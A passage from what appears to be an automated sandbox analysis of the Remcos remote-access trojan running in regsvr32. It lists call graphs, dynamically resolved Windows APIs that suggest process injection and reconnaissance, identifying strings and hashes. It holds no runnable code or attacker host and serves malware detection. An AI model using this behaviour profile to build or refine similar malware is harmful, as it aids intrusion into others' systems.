2a0edae 47141 2a01e65 22 API calls 46797->47141 46806 2a0ee0a ___scrt_get_show_window_mode 46798->46806 46799 2a0ed3e 46800 2a0ed45 46799->46800 47135 2a01e65 22 API calls 46800->47135 46804 2a0edc0 47142 2a01e65 22 API calls 46804->47142 46805 2a0ed53 47136 2a0da34 31 API calls 46805->47136 46806->46798 47145 2a13947 31 API calls 46806->47145 46807 2a0ef51 47151 2a01e65 22 API calls 46807->47151 46811 2a0ed66 47137 2a01f13 28 API calls 46811->47137 46812 2a0ede9 47143 2a01e65 22 API calls 46812->47143 46813 2a0ef76 47152 2a02093 28 API calls 46813->47152 46817 2a0ed72 47138 2a01f09 11 API calls 46817->47138 46818 2a0edfa 47144 2a0cdf9 45 API calls _wcslen 46818->47144 46819 2a0ef88 47153 2a1376f 14 API calls 46819->47153 46821 2a0ed7b 46821->46786 46825 2a0eea3 ctype 47146 2a01e65 22 API calls 46825->47146 46826 2a0ef9e 47154 2a01e65 
22 API calls 46826->47154 46828 2a0efaa 47155 2a3baac 39 API calls _swprintf 46828->47155 46831 2a0efb7 46833 2a0efe4 46831->46833 47156 2a1cd9b 86 API calls ___scrt_get_show_window_mode 46831->47156 46832 2a0eeba 46832->46807 47147 2a01e65 22 API calls 46832->47147 47157 2a02093 28 API calls 46833->47157 46836 2a0eed7 47148 2a1bc5e 28 API calls 46836->47148 46837 2a0efc8 CreateThread 46837->46833 47315 2a1d45d 10 API calls 46837->47315 46840 2a0eff9 47158 2a02093 28 API calls 46840->47158 46841 2a0eee3 47149 2a0f474 103 API calls 46841->47149 46844 2a0f008 47159 2a1b4ef 79 API calls 46844->47159 46845 2a0eee8 46845->46807 46847 2a0eeef 46845->46847 46847->46731 46848 2a0f00d 47160 2a01e65 22 API calls 46848->47160 46850 2a0f019 47161 2a01e65 22 API calls 46850->47161 46852 2a0f02b 47162 2a01e65 22 API calls 46852->47162 46854 2a0f04b 47163 2a3baac 39 API calls _swprintf 46854->47163 46856 2a0f058 47164 2a01e65 22 API calls 46856->47164 46858 2a0f063 47165 2a01e65 22 API calls 46858->47165 46860 2a0f074 47166 2a01e65 22 API calls 46860->47166 46862 2a0f089 47167 2a01e65 22 API calls 46862->47167 46864 2a0f09a 46865 2a0f0a1 StrToIntA 46864->46865 47168 2a09de4 169 API calls _wcslen 46865->47168 46867 2a0f0b3 47169 2a01e65 22 API calls 46867->47169 46869 2a0f101 47178 2a01e65 22 API calls 46869->47178 46870 2a0f0bc 46870->46869 47170 2a344ea 46870->47170 46875 2a0f0e4 46878 2a0f0eb CreateThread 46875->46878 46876 2a0f159 47180 2a01e65 22 API calls 46876->47180 46877 2a0f111 46877->46876 46879 2a344ea new 22 API calls 46877->46879 46878->46869 47318 2a19fb4 102 API calls __EH_prolog 46878->47318 46881 2a0f126 46879->46881 47179 2a01e65 22 API calls 46881->47179 46883 2a0f138 46886 2a0f13f CreateThread 46883->46886 46884 2a0f1cc 47186 2a01e65 22 API calls 46884->47186 46885 2a0f162 46885->46884 47181 2a01e65 22 API calls 46885->47181 46886->46876 47316 2a19fb4 102 API calls __EH_prolog 46886->47316 46889 2a0f17e 47182 2a01e65 22 API calls 46889->47182 46890 2a0f1d5 
46891 2a0f21a 46890->46891 47187 2a01e65 22 API calls 46890->47187 47191 2a1b60d 79 API calls 46891->47191 46894 2a0f193 47183 2a0d9e8 31 API calls 46894->47183 46896 2a0f1ea 47188 2a01e65 22 API calls 46896->47188 46897 2a0f223 47192 2a01f13 28 API calls 46897->47192 46899 2a0f22e 47193 2a01f09 11 API calls 46899->47193 46903 2a0f1a6 47184 2a01f13 28 API calls 46903->47184 46904 2a0f237 CreateThread 46909 2a0f264 46904->46909 46910 2a0f258 CreateThread 46904->46910 47317 2a0f7a7 120 API calls 46904->47317 46905 2a0f1ff 47189 2a3baac 39 API calls _swprintf 46905->47189 46908 2a0f1b2 47185 2a01f09 11 API calls 46908->47185 46912 2a0f279 46909->46912 46913 2a0f26d CreateThread 46909->46913 46910->46909 47319 2a120f7 137 API calls 46910->47319 46917 2a0f2cc 46912->46917 47194 2a02093 28 API calls 46912->47194 46913->46912 47313 2a126db 38 API calls ___scrt_get_show_window_mode 46913->47313 46915 2a0f1bb CreateThread 46915->46884 47314 2a01be9 49 API calls 46915->47314 46916 2a0f20c 47190 2a0c162 7 API calls 46916->47190 47196 2a134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 46917->47196 46920 2a0f29c 47195 2a052fd 28 API calls 46920->47195 46924 2a0f2e4 46924->46775 47197 2a1bc5e 28 API calls 46924->47197 46929 2a0f2fd 47198 2a1361b 31 API calls 46929->47198 46933 2a0f313 47199 2a01f09 11 API calls 46933->47199 46935 2a0f346 DeleteFileW 46936 2a0f34d 46935->46936 46937 2a0f31e 46935->46937 47202 2a1bc5e 28 API calls 46936->47202 46937->46935 46937->46936 46938 2a0f334 Sleep 46937->46938 46938->46937 46940 2a34984 46939->46940 46940->46643 46941 2a4341f 46940->46941 47321 2a4319c 46941->47321 46944->46626 46945->46629 46946->46635 46947->46632 46948->46645 46949->46631 46950->46651 46951->46653 46956 2a4fb68 46952->46956 46955 2a38f5a 8 API calls 3 library calls 46955->46654 46959 2a4fb85 46956->46959 46960 2a4fb81 46956->46960 46958 2a345bd 46958->46657 46958->46955 46959->46960 46962 2a49ca6 46959->46962 46974 2a34fcb 46960->46974 46963 2a49cb2 

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,02A4328B,00000000,02A6E948,0000000C,02A433E2,00000000,00000002,00000000), ref: 02A432D6
                                      • TerminateProcess.KERNEL32(00000000,?,02A4328B,00000000,02A6E948,0000000C,02A433E2,00000000,00000002,00000000), ref: 02A432DD
                                      • ExitProcess.KERNEL32 ref: 02A432EF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: aceb1ad295b8a7e35cbbf552428b308960017a575f5648c406d898e977a0ad4e
                                      • Instruction ID: b12fb6be2ee46b8be4d63c0ef2aa40de1e4ed3a7bcf2fefa072b60822cc887a0
                                      • Opcode Fuzzy Hash: aceb1ad295b8a7e35cbbf552428b308960017a575f5648c406d898e977a0ad4e
                                      • Instruction Fuzzy Hash: DEE0BF31881255EFCF526F54D949A9E7B6AFF80355F104454F9094A121CF3AD952CA80

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02A0E9E1), ref: 02A1CB65
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CB6E
                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02A0E9E1), ref: 02A1CB85
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CB88
                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02A0E9E1), ref: 02A1CB9A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CB9D
                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02A0E9E1), ref: 02A1CBAE
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBB1
                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02A0E9E1), ref: 02A1CBC3
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBC6
                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02A0E9E1), ref: 02A1CBD2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBD5
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02A0E9E1), ref: 02A1CBE6
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBE9
                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02A0E9E1), ref: 02A1CBFA
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBFD
                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02A0E9E1), ref: 02A1CC0E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC11
                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02A0E9E1), ref: 02A1CC22
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC25
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02A0E9E1), ref: 02A1CC36
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC39
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02A0E9E1), ref: 02A1CC4A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC4D
                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02A0E9E1), ref: 02A1CC5E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC61
                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02A0E9E1), ref: 02A1CC72
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC75
                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02A0E9E1), ref: 02A1CC83
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC86
                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,02A0E9E1), ref: 02A1CC97
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC9A
                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,02A0E9E1), ref: 02A1CCA7
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCAA
                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,02A0E9E1), ref: 02A1CCB7
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCBA
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,02A0E9E1), ref: 02A1CCCC
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCCF
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,02A0E9E1), ref: 02A1CCDC
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCDF
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,02A0E9E1), ref: 02A1CCF0
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCF3
                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,02A0E9E1), ref: 02A1CD04
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD07
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,02A0E9E1), ref: 02A1CD19
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD1C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,02A0E9E1), ref: 02A1CD29
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD2C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,02A0E9E1), ref: 02A1CD39
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD3C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,02A0E9E1), ref: 02A1CD49
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                      • API String ID: 4236061018-3687161714
                                      • Opcode ID: a2847f3162e16d7be7f6ae8d1bf627a16a2a99f305c19c53c2b5d0cc1c3b63f4
                                      • Instruction ID: 5cd1b6cf3f4d760fd529baef9ef62fd6de1168a6b15cdb92d771998bf236cac7
                                      • Opcode Fuzzy Hash: a2847f3162e16d7be7f6ae8d1bf627a16a2a99f305c19c53c2b5d0cc1c3b63f4
                                      • Instruction Fuzzy Hash: CC419DA4EC0358BAFB107BB65C4DD2B3F6EF989AB43014817B155A7110DFB8D8158FA8

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02A0E9E1), ref: 02A1CB65
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CB6E
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02A0E9E1), ref: 02A1CB85
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CB88
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02A0E9E1), ref: 02A1CB9A
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CB9D
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02A0E9E1), ref: 02A1CBAE
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBB1
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02A0E9E1), ref: 02A1CBC3
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBC6
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02A0E9E1), ref: 02A1CBD2
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBD5
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02A0E9E1), ref: 02A1CBE6
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBE9
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02A0E9E1), ref: 02A1CBFA
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBFD
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02A0E9E1), ref: 02A1CC0E
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC11
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02A0E9E1), ref: 02A1CC22
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC25
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02A0E9E1), ref: 02A1CC36
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC39
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02A0E9E1), ref: 02A1CC4A
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC4D
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02A0E9E1), ref: 02A1CC5E
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC61
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02A0E9E1), ref: 02A1CC72
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC75
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02A0E9E1), ref: 02A1CC83
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104), ref: 02A0E9EE
                                        • Part of subcall function 02A10F37: __EH_prolog.LIBCMT ref: 02A10F3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                      • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\regsvr32.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                      • API String ID: 2830904901-1950130056
                                      • Opcode ID: f898690b16231d374da2b8fcdd45c02775b4925b1e576bf294b5e613800e6df8
                                      • Instruction ID: e9b464dc2303ee5019f74e39a52e3c831c1bfd96bc7308875affc711f358ac25
                                      • Opcode Fuzzy Hash: f898690b16231d374da2b8fcdd45c02775b4925b1e576bf294b5e613800e6df8
                                      • Instruction Fuzzy Hash: 36320960FC43402BEA25B770BEE5BBE679B9F81750F80085FA5469B1C0DFA88D058F95

                                      Control-flow Graph

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,02A74EF8,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E38
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E43
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E4C
                                      • closesocket.WS2_32(?), ref: 02A04E5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E91
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EA2
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EA9
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EBA
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EBF
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EC4
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04ED1
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04ED6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                      • String ID:
                                      • API String ID: 3658366068-0
                                      • Opcode ID: 3df4f971ab8a24296d0750490abac40a08e55de67e08165edf36dd6e55253d8f
                                      • Instruction ID: 45df83566362e7af71ce2758b55b4d1085169e73ce58e025c8d37187e9fbc1dc
                                      • Opcode Fuzzy Hash: 3df4f971ab8a24296d0750490abac40a08e55de67e08165edf36dd6e55253d8f
                                      • Instruction Fuzzy Hash: 39210C31440B159FDB216B25EC89B1BB7A2FF44325F104A19E1E205AF0CF61A821DF54

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,02A4850D,?,00000000,00000000,00000000,?,02A48839,00000006,FlsSetValue), ref: 02A48598
                                      • GetLastError.KERNEL32(?,02A4850D,?,00000000,00000000,00000000,?,02A48839,00000006,FlsSetValue,02A5F160,02A5F168,00000000,00000364,?,02A482E7), ref: 02A485A4
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02A4850D,?,00000000,00000000,00000000,?,02A48839,00000006,FlsSetValue,02A5F160,02A5F168,00000000), ref: 02A485B2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: f9f4039d61f4a6a14bd31acb51cbfb3fcd6b7f21bf5783f801e5d1602d970925
                                      • Instruction ID: 7335e72961737b79b72bceab3232151ef91881e2553b8758bd9c292e3d780b20
                                      • Opcode Fuzzy Hash: f9f4039d61f4a6a14bd31acb51cbfb3fcd6b7f21bf5783f801e5d1602d970925
                                      • Instruction Fuzzy Hash: 5A01FC32A46333DFC7214B78BC84A5B77A9AF84761B110924FD05D7140DF34D911CAE1

                                      Control-flow Graph

                                      control_flow_graph 486 2a484ca-2a484f4 487 2a484f6-2a484f8 486->487 488 2a4855f 486->488 489 2a484fe-2a48504 487->489 490 2a484fa-2a484fc 487->490 491 2a48561-2a48565 488->491 492 2a48506-2a48508 call 2a48566 489->492 493 2a48520 489->493 490->491 498 2a4850d-2a48510 492->498 494 2a48522-2a48524 493->494 496 2a48526-2a48534 GetProcAddress 494->496 497 2a4854f-2a4855d 494->497 499 2a48536-2a4853f call 2a3436e 496->499 500 2a48549 496->500 497->488 501 2a48541-2a48547 498->501 502 2a48512-2a48518 498->502 499->490 500->497 501->494 502->492 504 2a4851a 502->504 504->493
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 02A4852A
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 02A48537
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: 295700d425a2b1bf4e6aa0c15b2b6bfe97f9bf3ab8d93039d703a488c2243e28
                                      • Instruction ID: 306233dec1e470ca78dfb6b810ea764102a09a9ccc16b04209267828fe32e192
                                      • Opcode Fuzzy Hash: 295700d425a2b1bf4e6aa0c15b2b6bfe97f9bf3ab8d93039d703a488c2243e28
                                      • Instruction Fuzzy Hash: E411CA37A415219F9B22DF1CFC8095A73D6EBC4B24B164560FD19BB244DF34EC1286D1

                                      Control-flow Graph

                                      control_flow_graph 506 2a0165e-2a01664 507 2a01666-2a01668 506->507 508 2a01669-2a01674 506->508 509 2a01676 508->509 510 2a0167b-2a01685 508->510 509->510 511 2a01687-2a0168d 510->511 512 2a016a8-2a016a9 call 2a344ea 510->512 511->512 513 2a0168f-2a01694 511->513 515 2a016ae-2a016af 512->515 513->509 516 2a01696-2a016a6 call 2a344ea 513->516 517 2a016b1-2a016b3 515->517 516->517
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction ID: 2c483f97097fa640d780bbec032a9981e600a634b8e4f5ee87f0435d0e5730d9
                                      • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction Fuzzy Hash: 81F082B06052015ADB1D8B74EDE4BAA77965B84365F588B2DF01EC60D0DF30C895CA08

                                      Control-flow Graph

                                      control_flow_graph 520 2a0d069-2a0d095 call 2a01fab CreateMutexA GetLastError
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,02A0EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,02A660BC,00000003,00000000), ref: 02A0D078
                                      • GetLastError.KERNEL32 ref: 02A0D083
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorLastMutex
                                      • String ID:
                                      • API String ID: 1925916568-0
                                      • Opcode ID: 054bc7e645ce67b558a3276af3ac757095caa3d399b11a09f193ecd60d98a2fe
                                      • Instruction ID: c339d32e2cc717f9d2a5dc4e038fc02295a895c4afa89ba781ba48ebac351f3e
                                      • Opcode Fuzzy Hash: 054bc7e645ce67b558a3276af3ac757095caa3d399b11a09f193ecd60d98a2fe
                                      • Instruction Fuzzy Hash: B9D012B0E84311DBD7081770E99975F39959744701F80081AF907CD9D0CE68C4A18915

                                      Control-flow Graph

                                      control_flow_graph 523 2a500d4-2a500e1 call 2a45af3 525 2a500e6-2a500f1 523->525 526 2a500f7-2a500ff 525->526 527 2a500f3-2a500f5 525->527 528 2a5013f-2a5014d call 2a46782 526->528 529 2a50101-2a50105 526->529 527->528 530 2a50107-2a50139 call 2a48a84 529->530 535 2a5013b-2a5013e 530->535 535->528
                                      APIs
                                        • Part of subcall function 02A45AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02A482CA,00000001,00000364,?,00000000,?,02A3BC87,00000000,?,?,02A3BD0B,00000000), ref: 02A45B34
                                      • _free.LIBCMT ref: 02A50140
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                      • Instruction ID: f070ad12033692744cee4c46a75551c8d995cec905fc975e7ba97543fbbdf89c
                                      • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                      • Instruction Fuzzy Hash: 7B012B725403449BE3218F69D885E5AFBD9FB89370F25062DD59443280EF70A805C674

                                      Control-flow Graph

                                      control_flow_graph 536 2a45af3-2a45afe 537 2a45b00-2a45b0a 536->537 538 2a45b0c-2a45b12 536->538 537->538 539 2a45b40-2a45b4b call 2a405dd 537->539 540 2a45b14-2a45b15 538->540 541 2a45b2b-2a45b3c RtlAllocateHeap 538->541 546 2a45b4d-2a45b4f 539->546 540->541 542 2a45b17-2a45b1e call 2a45545 541->542 543 2a45b3e 541->543 542->539 549 2a45b20-2a45b29 call 2a42f80 542->549 543->546 549->539 549->541
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02A482CA,00000001,00000364,?,00000000,?,02A3BC87,00000000,?,?,02A3BD0B,00000000), ref: 02A45B34
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: b8eeb05da265f8865f57396f22fa8586bf58ff7c7cd7cdd6c08fab0b7b088d86
                                      • Instruction ID: b8a7e280ac151c2a5b78ac2fcbb981d88387516b3e7e91456c350c682cf91d7d
